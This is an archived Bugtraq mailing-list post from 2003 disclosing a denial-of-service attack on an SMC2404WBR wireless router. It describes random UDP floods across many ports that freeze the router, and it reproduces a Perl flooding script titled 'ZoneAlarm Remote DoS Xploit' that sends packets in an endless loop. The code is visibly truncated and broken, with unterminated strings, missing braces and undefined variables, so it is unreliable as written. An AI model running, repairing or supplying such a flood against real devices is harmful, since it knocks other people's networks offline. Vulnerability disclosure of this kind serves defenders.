Home page logo

bugtraq logo Bugtraq mailing list archives

SMC Router Denial of Service exploit
From: <res076cf () alltel net>
Date: 26 Sep 2003 07:13:52 -0000


Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL
Broadband Router.

Sending a stream of UDP random packets to multiple ports 0-65000 on the
router will cause the router to freeze until a soft reset is performed on
it.  In one case, the router did survive but did not come back "alive" for
around 15 minutes.  All other tries (2 others) the router had to be reset.
This attack was performed using the Zonealarm+Windows 98 DoS code written by

The code follows:

use Socket;

print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";

my ($target);

my $ia = inet_aton($target) || die ("[-] Unable to resolve

socket(DoS, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
 $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
 $port=int(rand 65000) +1;
 send(DoS, 0, $size, sockaddr_in($port, $iaddr));
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

Dave, put down the Windows disk Dave.  Dave?  DAVE?!!?  - Hal9000

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]